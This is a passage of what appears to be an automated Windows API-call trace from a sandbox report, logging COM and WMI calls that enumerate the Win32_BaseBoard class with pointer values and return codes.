Data4=([0]=0x8b, [1]=0x2e, [2]=0x37, [3]=0xd5, [4]=0x95, [5]=0x65, [6]=0x1e, [7]=0x40)), ppTInfo=0x2261c8c4 | out: ppTInfo=0x2261c8c4*=0x1f837c7c) returned 0x0 [0223.273] IUnknown:Release (This=0x1f7db530) returned 0x1 [0223.273] IUnknown:AddRef (This=0x1f837c7c) returned 0x2 [0223.274] ITypeInfo:RemoteGetTypeAttr (in: This=0x1f837c7c, ppTypeAttr=0x1fe1e37c, pDummy=0x3df21645 | out: ppTypeAttr=0x1fe1e37c, pDummy=0x3df21645) returned 0x0 [0223.286] ITypeInfo:LocalReleaseTypeAttr (This=0x1f837c7c) returned 0x76ec20 [0223.287] IUnknown:Release (This=0x1f837c7c) returned 0x1 [0223.303] CoGetContextToken (in: pToken=0x1fe1e308 | out: pToken=0x1fe1e308) returned 0x0 [0223.304] CoGetContextToken (in: pToken=0x1fe1e2cc | out: pToken=0x1fe1e2cc) returned 0x0 [0223.304] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e300 | out: ppvObject=0x1fe1e300*=0x7421ac) returned 0x0 [0223.305] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e330 | out: pAptType=0x1fe1e330*=3) returned 0x0 [0223.306] IUnknown:Release (This=0x7421ac) returned 0x1 [0223.313] CoGetContextToken (in: pToken=0x1fe1e300 | out: pToken=0x1fe1e300) returned 0x0 [0223.327] IUnknown:Release (This=0x1f825ed0) returned 0x2 [0225.411] CoGetContextToken (in: pToken=0x1fe1e838 | out: pToken=0x1fe1e838) returned 0x0 [0225.421] LoadRegTypeLib (in: rguid=0x73bb364c*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x1fe1e834*=0x0 | out: pptlib=0x1fe1e834*=0x1f7db530) returned 0x0 [0225.425] ITypeLib:GetTypeInfoOfGuid (in: This=0x1f7db530, GUID=0x2261c8cc*(Data1=0xd2f68443, Data2=0x85dc, Data3=0x427e, Data4=([0]=0x91, [1]=0xd8, [2]=0x36, [3]=0x65, [4]=0x54, [5]=0xcc, [6]=0x75, [7]=0x4c)), ppTInfo=0x2261c8c0 | out: ppTInfo=0x2261c8c0*=0x1f837ca8) returned 0x0 [0225.425] IUnknown:Release (This=0x1f7db530) returned 0x2 [0225.426] IUnknown:AddRef (This=0x1f837ca8) returned 0x2 [0225.427] DispGetIDsOfNames (in: ptinfo=0x1f837ca8, rgszNames=0x1fe1e890*="InstancesOf", cNames=0x1, rgdispid=0x1fe1e880 | out: rgdispid=0x1fe1e880*=5) returned 0x0 [0225.434] IUnknown:Release (This=0x1f837ca8) returned 0x1 [0225.441] IUnknown:AddRef (This=0x1f837ca8) returned 0x2 [0225.441] ITypeInfo:LocalInvoke (This=0x1f837ca8) returned 0x0 [0225.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0225.449] GetCurrentThreadId () returned 0x474 [0225.467] WbemLocator:IUnknown:AddRef (This=0x2261d304) returned 0x3 [0225.468] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0225.476] GetCurrentThreadId () returned 0x474 [0225.497] IWbemServices:CreateInstanceEnum (in: This=0x2261d304, strFilter="Win32_BaseBoard", lFlags=16, pCtx=0x0, ppEnum=0x1fe1e4dc | out: ppEnum=0x1fe1e4dc*=0x226108dc) returned 0x0 [0225.522] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610918 [0225.523] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610978 [0225.524] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d378 [0225.524] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c9a8 [0225.573] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d3d8 [0225.574] IUnknown:QueryInterface (in: This=0x226108dc, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e3f4 | out: ppvObject=0x1fe1e3f4*=0x226108e0) returned 0x0 [0225.575] IClientSecurity:QueryBlanket (in: This=0x226108e0, pProxy=0x226108dc, pAuthnSvc=0x1fe1e3e4, pAuthzSvc=0x1fe1e3e8, pServerPrincName=0x0, pAuthnLevel=0x1fe1e410, pImpLevel=0x1fe1e40c, pAuthInfo=0x0, pCapabilites=0x1fe1e3fc | out: pAuthnSvc=0x1fe1e3e4*=0xa, pAuthzSvc=0x1fe1e3e8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e410*=0x6, pImpLevel=0x1fe1e40c*=0x2, pAuthInfo=0x0, pCapabilites=0x1fe1e3fc*=0x1) returned 0x0 [0225.575] IUnknown:Release (This=0x226108e0) returned 0x1 [0225.575] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0225.583] GetCurrentThreadId () returned 0x474 [0225.643] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d304, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e3d8 | out: ppvObject=0x1fe1e3d8*=0x1f83376c) returned 0x0 [0225.644] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83376c, pProxy=0x2261d304, pAuthnSvc=0x1fe1e3c8, pAuthzSvc=0x1fe1e3cc, pServerPrincName=0x0, pAuthnLevel=0x1fe1e3f8, pImpLevel=0x1fe1e3fc, pAuthInfo=0x0, pCapabilites=0x1fe1e3e0 | out: pAuthnSvc=0x1fe1e3c8*=0xa, pAuthzSvc=0x1fe1e3cc*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e3f8*=0x6, pImpLevel=0x1fe1e3fc*=0x3, pAuthInfo=0x0, pCapabilites=0x1fe1e3e0*=0x20) returned 0x0 [0225.644] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x3 [0225.644] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0225.651] GetCurrentThreadId () returned 0x474 [0225.670] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d304, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e3d8 | out: ppvObject=0x1fe1e3d8*=0x1f83376c) returned 0x0 [0225.671] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83376c, pProxy=0x2261d304, pAuthnSvc=0x1fe1e3c8, pAuthzSvc=0x1fe1e3cc, pServerPrincName=0x0, pAuthnLevel=0x1fe1e3fc, pImpLevel=0x1fe1e3f8, pAuthInfo=0x0, pCapabilites=0x1fe1e3e0 | out: pAuthnSvc=0x1fe1e3c8*=0xa, pAuthzSvc=0x1fe1e3cc*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e3fc*=0x6, pImpLevel=0x1fe1e3f8*=0x3, pAuthInfo=0x0, pCapabilites=0x1fe1e3e0*=0x20) returned 0x0 [0225.671] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x3 [0225.671] IUnknown:QueryInterface (in: This=0x226108dc, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e424 | out: ppvObject=0x1fe1e424*=0x226108e0) returned 0x0 [0225.672] IClientSecurity:CopyProxy (in: This=0x226108e0, pProxy=0x226108dc, ppCopy=0x1fe1e428 | out: ppCopy=0x1fe1e428*=0x2261d51c) returned 0x0 [0225.678] IUnknown:QueryInterface (in: This=0x2261d51c, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e340 | out: ppvObject=0x1fe1e340*=0x2261d520) returned 0x0 [0225.679] IClientSecurity:QueryBlanket (in: This=0x2261d520, pProxy=0x2261d51c, pAuthnSvc=0x1fe1e364, pAuthzSvc=0x1fe1e354, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x1fe1e364*=0xa, pAuthzSvc=0x1fe1e354*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0225.679] IUnknown:Release (This=0x2261d520) returned 0x3 [0225.679] IUnknown:QueryInterface (in: This=0x2261d51c, riid=0x73bb34f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e318 | out: ppvObject=0x1fe1e318*=0x1f779084) returned 0x0 [0225.679] IUnknown:QueryInterface (in: This=0x2261d51c, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e31c | out: ppvObject=0x1fe1e31c*=0x2261d520) returned 0x0 [0225.680] IClientSecurity:SetBlanket (This=0x2261d520, pProxy=0x2261d51c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0225.798] IUnknown:Release (This=0x2261d520) returned 0x4 [0225.798] WbemLocator:IUnknown:Release (This=0x1f779084) returned 0x3 [0225.804] IUnknown:Release (This=0x226108e0) returned 0x2 [0225.810] IUnknown:AddRef (This=0x2261d51c) returned 0x3 [0225.818] IUnknown:Release (This=0x226108dc) returned 0x2 [0225.823] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1fe1e494 | out: pperrinfo=0x1fe1e494*=0x0) returned 0x1 [0225.834] WbemLocator:IUnknown:Release (This=0x2261d304) returned 0x2 [0225.834] IUnknown:Release (This=0x1f837ca8) returned 0x1 [0226.855] LoadRegTypeLib (in: rguid=0x73bb364c*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x1fe1e130*=0x0 | out: pptlib=0x1fe1e130*=0x1f7db530) returned 0x0 [0226.860] ITypeLib:GetTypeInfoOfGuid (in: This=0x1f7db530, GUID=0x22610950*(Data1=0x4b83d61, Data2=0x21ae, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x33, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0x22610938 | out: ppTInfo=0x22610938*=0x1f837db0) returned 0x0 [0226.861] IUnknown:Release (This=0x1f7db530) returned 0x3 [0226.861] IUnknown:AddRef (This=0x1f837db0) returned 0x2 [0226.862] ITypeInfo:RemoteGetTypeAttr (in: This=0x1f837db0, ppTypeAttr=0x1fe1e174, pDummy=0x3df2144d | out: ppTypeAttr=0x1fe1e174, pDummy=0x3df2144d) returned 0x0 [0226.865] ITypeInfo:LocalReleaseTypeAttr (This=0x1f837db0) returned 0x76ec20 [0226.866] IUnknown:Release (This=0x1f837db0) returned 0x1 [0226.930] CoGetContextToken (in: pToken=0x1fe1e100 | out: pToken=0x1fe1e100) returned 0x0 [0226.930] CoGetContextToken (in: pToken=0x1fe1e0c4 | out: pToken=0x1fe1e0c4) returned 0x0 [0226.931] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e0f8 | out: ppvObject=0x1fe1e0f8*=0x7421ac) returned 0x0 [0226.932] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e128 | out: pAptType=0x1fe1e128*=3) returned 0x0 [0226.932] IUnknown:Release (This=0x7421ac) returned 0x1 [0226.940] CoGetContextToken (in: pToken=0x1fe1e0f8 | out: pToken=0x1fe1e0f8) returned 0x0 [0226.996] CoGetContextToken (in: pToken=0x1fe1eac8 | out: pToken=0x1fe1eac8) returned 0x0 [0226.996] CoGetContextToken (in: pToken=0x1fe1ea88 | out: pToken=0x1fe1ea88) returned 0x0 [0227.062] CoGetContextToken (in: pToken=0x1fe1eb10 | out: pToken=0x1fe1eb10) returned 0x0 [0227.066] LoadRegTypeLib (in: rguid=0x73bb364c*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x400, pptlib=0x1fe1eb10*=0x0 | out: pptlib=0x1fe1eb10*=0x1f7db530) returned 0x0 [0227.095] ITypeLib:GetTypeInfoOfGuid (in: This=0x1f7db530, GUID=0x22610940*(Data1=0x76a6415f, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0x22610934 | out: ppTInfo=0x22610934*=0x1f837d58) returned 0x0 [0227.096] IUnknown:Release (This=0x1f7db530) returned 0x4 [0227.096] IUnknown:AddRef (This=0x1f837d58) returned 0x2 [0227.097] ITypeInfo:LocalInvoke (This=0x1f837d58) returned 0x0 [0227.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.103] GetCurrentThreadId () returned 0x474 [0227.120] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610810 [0227.121] IUnknown:Release (This=0x1f837d58) returned 0x1 [0227.123] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0236.827] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x752350 [0236.879] GetLastError () returned 0x0 [0237.197] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x7523d8 [0237.251] GetLastError () returned 0x0 [0238.442] CoGetContextToken (in: pToken=0x1fe1e9d0 | out: pToken=0x1fe1e9d0) returned 0x0 [0238.766] CoGetContextToken (in: pToken=0x1fe1e5f8 | out: pToken=0x1fe1e5f8) returned 0x0 [0238.768] IUnknown:AddRef (This=0x1f837d58) returned 0x2 [0238.768] ITypeInfo:LocalInvoke (This=0x1f837d58) returned 0x0 [0238.768] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.774] GetCurrentThreadId () returned 0x474 [0238.791] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.796] GetCurrentThreadId () returned 0x474 [0238.812] IUnknown:AddRef (This=0x2261d51c) returned 0x3 [0238.813] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.821] GetCurrentThreadId () returned 0x474 [0238.838] IEnumWbemClassObject:Clone (in: This=0x2261d51c, ppEnum=0x1fe1e5e8 | out: ppEnum=0x1fe1e5e8*=0x2261d5e4) returned 0x0 [0238.847] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d620 [0238.848] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d680 [0238.849] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d6e0 [0238.849] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c988 [0238.850] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d740 [0238.851] IUnknown:QueryInterface (in: This=0x2261d5e4, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e500 | out: ppvObject=0x1fe1e500*=0x2261d5e8) returned 0x0 [0238.851] IClientSecurity:QueryBlanket (in: This=0x2261d5e8, pProxy=0x2261d5e4, pAuthnSvc=0x1fe1e4f0, pAuthzSvc=0x1fe1e4f4, pServerPrincName=0x0, pAuthnLevel=0x1fe1e51c, pImpLevel=0x1fe1e518, pAuthInfo=0x0, pCapabilites=0x1fe1e508 | out: pAuthnSvc=0x1fe1e4f0*=0xa, pAuthzSvc=0x1fe1e4f4*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e51c*=0x6, pImpLevel=0x1fe1e518*=0x2, pAuthInfo=0x0, pCapabilites=0x1fe1e508*=0x1) returned 0x0 [0238.852] IUnknown:Release (This=0x2261d5e8) returned 0x1 [0238.852] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.857] GetCurrentThreadId () returned 0x474 [0238.873] IUnknown:QueryInterface (in: This=0x2261d51c, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e4e4 | out: ppvObject=0x1fe1e4e4*=0x2261d520) returned 0x0 [0238.874] IClientSecurity:QueryBlanket (in: This=0x2261d520, pProxy=0x2261d51c, pAuthnSvc=0x1fe1e4d4, pAuthzSvc=0x1fe1e4d8, pServerPrincName=0x0, pAuthnLevel=0x1fe1e504, pImpLevel=0x1fe1e508, pAuthInfo=0x0, pCapabilites=0x1fe1e4ec | out: pAuthnSvc=0x1fe1e4d4*=0xa, pAuthzSvc=0x1fe1e4d8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e504*=0x6, pImpLevel=0x1fe1e508*=0x3, pAuthInfo=0x0, pCapabilites=0x1fe1e4ec*=0x20) returned 0x0 [0238.875] IUnknown:Release (This=0x2261d520) returned 0x3 [0238.875] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.881] GetCurrentThreadId () returned 0x474 [0238.897] IUnknown:QueryInterface (in: This=0x2261d51c, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e4e4 | out: ppvObject=0x1fe1e4e4*=0x2261d520) returned 0x0 [0238.898] IClientSecurity:QueryBlanket (in: This=0x2261d520, pProxy=0x2261d51c, pAuthnSvc=0x1fe1e4d4, pAuthzSvc=0x1fe1e4d8, pServerPrincName=0x0, pAuthnLevel=0x1fe1e508, pImpLevel=0x1fe1e504, pAuthInfo=0x0, pCapabilites=0x1fe1e4ec | out: pAuthnSvc=0x1fe1e4d4*=0xa, pAuthzSvc=0x1fe1e4d8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e508*=0x6, pImpLevel=0x1fe1e504*=0x3, pAuthInfo=0x0, pCapabilites=0x1fe1e4ec*=0x20) returned 0x0 [0238.898] IUnknown:Release (This=0x2261d520) returned 0x3 [0238.898] IUnknown:QueryInterface (in: This=0x2261d5e4, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e530 | out: ppvObject=0x1fe1e530*=0x2261d5e8) returned 0x0 [0238.898] IClientSecurity:CopyProxy (in: This=0x2261d5e8, pProxy=0x2261d5e4, ppCopy=0x1fe1e534 | out: ppCopy=0x1fe1e534*=0x2261d884) returned 0x0 [0238.904] IUnknown:QueryInterface (in: This=0x2261d884, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e44c | out: ppvObject=0x1fe1e44c*=0x2261d888) returned 0x0 [0238.905] IClientSecurity:QueryBlanket (in: This=0x2261d888, pProxy=0x2261d884, pAuthnSvc=0x1fe1e470, pAuthzSvc=0x1fe1e460, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x1fe1e470*=0xa, pAuthzSvc=0x1fe1e460*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0238.905] IUnknown:Release (This=0x2261d888) returned 0x3 [0238.905] IUnknown:QueryInterface (in: This=0x2261d884, riid=0x73bb34f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e424 | out: ppvObject=0x1fe1e424*=0x1f83e39c) returned 0x0 [0238.906] IUnknown:QueryInterface (in: This=0x2261d884, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e428 | out: ppvObject=0x1fe1e428*=0x2261d888) returned 0x0 [0238.906] IClientSecurity:SetBlanket (This=0x2261d888, pProxy=0x2261d884, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0238.913] IUnknown:Release (This=0x2261d888) returned 0x4 [0238.913] WbemLocator:IUnknown:Release (This=0x1f83e39c) returned 0x3 [0238.918] IUnknown:Release (This=0x2261d5e8) returned 0x2 [0238.924] IUnknown:AddRef (This=0x2261d884) returned 0x3 [0238.930] IUnknown:Release (This=0x2261d5e4) returned 0x2 [0238.935] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1fe1e5a0 | out: pperrinfo=0x1fe1e5a0*=0x0) returned 0x1 [0238.940] IUnknown:Release (This=0x2261d51c) returned 0x2 [0238.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.945] GetCurrentThreadId () returned 0x474 [0238.959] IUnknown:AddRef (This=0x2261d884) returned 0x3 [0238.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0238.964] GetCurrentThreadId () returned 0x474 [0238.979] IEnumWbemClassObject:Reset (This=0x2261d884) returned 0x0 [0238.982] IUnknown:Release (This=0x2261d884) returned 0x2 [0238.982] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610810 [0238.983] IUnknown:Release (This=0x1f837d58) returned 0x1 [0239.192] CoGetContextToken (in: pToken=0x1fe1e060 | out: pToken=0x1fe1e060) returned 0x0 [0239.193] CoGetContextToken (in: pToken=0x1fe1e024 | out: pToken=0x1fe1e024) returned 0x0 [0239.193] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e058 | out: ppvObject=0x1fe1e058*=0x7421ac) returned 0x0 [0239.195] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e088 | out: pAptType=0x1fe1e088*=3) returned 0x0 [0239.195] IUnknown:Release (This=0x7421ac) returned 0x1 [0239.205] CoGetContextToken (in: pToken=0x1fe1e058 | out: pToken=0x1fe1e058) returned 0x0 [0239.479] CoGetContextToken (in: pToken=0x1fe1eb10 | out: pToken=0x1fe1eb10) returned 0x0 [0239.481] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0239.487] GetCurrentThreadId () returned 0x474 [0239.501] IUnknown:AddRef (This=0x2261d884) returned 0x3 [0239.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0239.508] GetCurrentThreadId () returned 0x474 [0239.521] IEnumWbemClassObject:Next (in: This=0x2261d884, lTimeout=-1, uCount=0x1, apObjects=0x1fe1ec48, puReturned=0x1fe1ec40 | out: apObjects=0x1fe1ec48*=0x2261d8c0, puReturned=0x1fe1ec40*=0x1) returned 0x0 [0239.531] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c908 [0239.531] IUnknown:AddRef (This=0x2261d8c0) returned 0x2 [0239.532] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261fbd0 [0239.532] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261fc40 [0239.533] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261fca0 [0239.533] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c9c8 [0239.534] WbemLocator:IUnknown:AddRef (This=0x2261d304) returned 0x3 [0239.534] IUnknown:AddRef (This=0x2261d884) returned 0x4 [0239.535] IUnknown:QueryInterface (in: This=0x2261d884, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1eba8 | out: ppvObject=0x1fe1eba8*=0x2261d888) returned 0x0 [0239.535] IClientSecurity:QueryBlanket (in: This=0x2261d888, pProxy=0x2261d884, pAuthnSvc=0x1fe1eb98, pAuthzSvc=0x1fe1eb9c, pServerPrincName=0x0, pAuthnLevel=0x1fe1ebb8, pImpLevel=0x1fe1ebc4, pAuthInfo=0x0, pCapabilites=0x1fe1ebb0 | out: pAuthnSvc=0x1fe1eb98*=0xa, pAuthzSvc=0x1fe1eb9c*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1ebb8*=0x6, pImpLevel=0x1fe1ebc4*=0x3, pAuthInfo=0x0, pCapabilites=0x1fe1ebb0*=0x20) returned 0x0 [0239.535] IUnknown:Release (This=0x2261d888) returned 0x4 [0239.536] WbemLocator:IUnknown:Release (This=0x2261d304) returned 0x2 [0239.540] WbemLocator:IUnknown:AddRef (This=0x2261d304) returned 0x3 [0239.544] IUnknown:Release (This=0x2261d884) returned 0x3 [0239.545] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe [0239.545] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261bd98 [0239.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c9e8 [0239.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x226109d8 [0239.546] IUnknown:AddRef (This=0x2261d8c0) returned 0x3 [0239.547] IUnknown:Release (This=0x2261d8c0) returned 0x2 [0239.552] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1fe1ebfc | out: pperrinfo=0x1fe1ebfc*=0x0) returned 0x1 [0239.556] IUnknown:Release (This=0x2261d884) returned 0x2 [0239.562] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1fe1ec40 | out: pperrinfo=0x1fe1ec40*=0x0) returned 0x1 [0239.600] LoadRegTypeLib (in: rguid=0x73bb364c*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x1fe1e4b0*=0x0 | out: pptlib=0x1fe1e4b0*=0x1f7db530) returned 0x0 [0239.603] ITypeLib:GetTypeInfoOfGuid (in: This=0x1f7db530, GUID=0x73bc70c4*(Data1=0xd6bdafb2, Data2=0x9435, Data3=0x491f, Data4=([0]=0xbb, [1]=0x87, [2]=0x6a, [3]=0xa0, [4]=0xf0, [5]=0xbc, [6]=0x31, [7]=0xa2)), ppTInfo=0x2261bdb4 | out: ppTInfo=0x2261bdb4*=0x1f837ddc) returned 0x0 [0239.604] IUnknown:Release (This=0x1f7db530) returned 0x5 [0239.604] IUnknown:AddRef (This=0x1f837ddc) returned 0x2 [0239.605] ITypeInfo:RemoteGetTypeAttr (in: This=0x1f837ddc, ppTypeAttr=0x1fe1e504, pDummy=0x3df210dd | out: ppTypeAttr=0x1fe1e504, pDummy=0x3df210dd) returned 0x0 [0239.608] ITypeInfo:LocalReleaseTypeAttr (This=0x1f837ddc) returned 0x76ec20 [0239.608] IUnknown:Release 